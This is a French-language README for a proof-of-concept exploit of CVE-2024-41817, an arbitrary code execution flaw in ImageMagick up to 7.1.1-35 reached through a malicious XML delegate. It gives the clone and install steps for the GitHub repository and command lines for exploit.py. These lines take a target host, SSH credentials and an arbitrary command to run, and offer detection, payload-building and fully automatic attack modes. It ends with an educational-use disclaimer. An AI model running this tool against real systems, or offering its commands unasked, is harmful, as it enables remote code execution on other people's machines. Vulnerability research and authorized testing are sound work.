
POC CVE-2024-41817 ImageMagick <= 7.1.1-35 Exécution de code arbitraire
Preuve de concept d'exploit pour ImageMagick versions <= 7.1.1-35 permettant l'exécution de code arbitraire via une délégation XML malveillante.
Cet exploit exploite une vulnérabilité dans ImageMagick qui permet l'exécution de code arbitraire via des bibliothèques spécialement conçues. Le script peut :
git clone https://github.com/Dxsk/CVE-2024-41817-poc/
cd CVE-2024-41817-poc
pip install -r requirements.txt
python3 exploit.py -H <target> -p <port> -u <user> -P <password> -d
python3 exploit.py -c "command" -B
python3 exploit.py -c "command" -H <target> -p <port> -u <user> -P <password> -A
-c, --command : Commande à exécuter (par défaut : "id")-H, --host : Hôte cible-p, --port : Port SSH (par défaut : 22)-u, --username : Nom d'utilisateur SSH-P, --password : Mot de passe SSH-d, --detection : Détection automatique d'ImageMagick si vulnérable-B, --build : Construire uniquement la charge utile-A, --auto : Mode automatique complet-v, --verbose : Sortie détailléeCet outil est uniquement à des fins éducatives. Utilisez-le uniquement contre des systèmes que vous avez l'autorisation de tester.